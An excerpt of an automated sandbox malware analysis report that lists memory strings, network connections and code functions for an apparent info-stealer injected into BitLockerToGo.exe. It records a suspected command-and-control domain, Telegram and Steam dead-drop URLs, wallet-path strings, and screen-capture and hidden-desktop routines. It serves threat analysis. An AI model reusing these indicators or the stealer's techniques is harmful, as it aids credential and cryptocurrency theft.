                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.dr, HubApps Icons.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.dr, HubApps Icons.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyouKEGDGH
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyouXEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8K
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyoua4a7f1267effnt-Disposition:
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyouata
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                          Source: 000003.log3.13.drString found in binary or memory: https://ntp.msn.com/
                          Source: QuotaManager.13.drString found in binary or memory: https://ntp.msn.com/_default
                          Source: Session_13376674111222586.13.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                          Source: QuotaManager.13.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                          Source: msedge.exe, 0000000B.00000002.2321715053.00006FE8003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                          Source: chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                          Source: chrome.exe, 00000007.00000003.2164260236.00002FC000BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                          Source: chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                          Source: chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://open.spotify.com
                          Source: chrome.exe, 00000007.00000003.2109818643.00002FC000790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                          Source: chrome.exe, 00000007.00000003.2109818643.00002FC000790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                          Source: chrome.exe, 00000007.00000003.2109818643.00002FC000790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                          Source: chrome.exe, 00000007.00000003.2109818643.00002FC000790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                          Source: chrome.exe, 00000007.00000003.2109818643.00002FC000790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://outlook.live.com/mail/0/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://outlook.office.com/mail/0/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSessionp
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                          Source: msedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                          Source: chrome.exe, 00000007.00000003.2115866965.00002FC00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115530307.00002FC000314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115781780.00002FC0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                          Source: chrome.exe, 00000007.00000003.2164352470.00002FC002D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2158236324.00002FC002BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2157940006.00002FC002C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2161928831.00002FC002C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                          Source: S0FTWARE.exe, 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199802540894
                          Source: S0FTWARE.exe, 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199802540894r08etMozilla/5.0
                          Source: IEHIII.3.drString found in binary or memory: https://support.mozilla.org
                          Source: IEHIII.3.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: IEHIII.3.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.000000000313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.000000000313B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/fu4chmo
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.000000000313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/fu4chmo:
                          Source: BitLockerToGo.exe, 00000003.00000003.1862532120.0000000003173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/fu4chmoQ
                          Source: S0FTWARE.exe, 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/fu4chmor08etMozilla/5.0
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://tidal.com/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://twitter.com/
                          Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.13.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
                          Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.13.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
                          Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.13.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://vibe.naver.com/today
                          Source: BitLockerToGo.exe, 00000003.00000003.1861928505.0000000003173000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://web.telegram.org/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://web.whatsapp.com
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660816657.0000000003234000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, BGDAAE.3.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.deezer.com/
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003314000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://www.digicert.com/CPS0
                          Source: BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, KFIJEG.3.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: chrome.exe, 00000007.00000003.2109739044.00002FC000DBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                          Source: content_new.js.13.dr, content.js.13.drString found in binary or memory: https://www.google.com/chrome
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                          Source: BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003346000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, FBFCAK.3.dr, KFIJEG.3.dr, Web Data.13.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: chrome.exe, 00000007.00000003.2164352470.00002FC002D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2158236324.00002FC002BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2157940006.00002FC002C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2161928831.00002FC002C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                          Source: chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                          Source: chrome.exe, 00000007.00000003.2115781780.00002FC0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                          Source: chrome.exe, 00000007.00000003.2154423360.00002FC002664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2154333501.00002FC002660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2154140903.00002FC00264C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2154230659.00002FC002650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                          Source: chrome.exe, 00000007.00000003.2113743139.00002FC000FBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                          Source: chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                          Source: chrome.exe, 00000007.00000003.2164352470.00002FC002D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2161893325.00002FC000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2157940006.00002FC002C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2161928831.00002FC002C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2158560002.00002FC002C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                          Source: chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US._3uvDuX1Bhg.2019.O/rt=j/m=q_dnp
                          Source: chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.iheart.com/podcast/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.instagram.com
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660816657.0000000003234000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, BGDAAE.3.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.last.fm/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.messenger.com
                          Source: IEHIII.3.drString found in binary or memory: https://www.mozilla.org
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: unknown; HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.8:49710 version: TLS 1.2
                          Source: unknown; HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49711 version: TLS 1.2
                          Source: unknown; HTTPS traffic detected: 49.13.32.95:443 -> 192.168.2.8:49712 version: TLS 1.2
                          Source: unknown; HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.8:49716 version: TLS 1.2
                          Source: unknown; HTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.8:49738 version: TLS 1.2
                          Source: unknown; HTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.8:49741 version: TLS 1.2
                          Source: unknown; HTTPS traffic detected: 40.126.53.18:443 -> 192.168.2.8:49752 version: TLS 1.2
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_008F3BB1 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_008E8DEA _memset,wsprintfA,OpenDesktopA,CreateDesktopA,_memset,lstrcat,lstrcat,lstrcat,_memset,lstrcpy,_memset,CreateProcessA,Sleep,CloseDesktop

                          System Summary

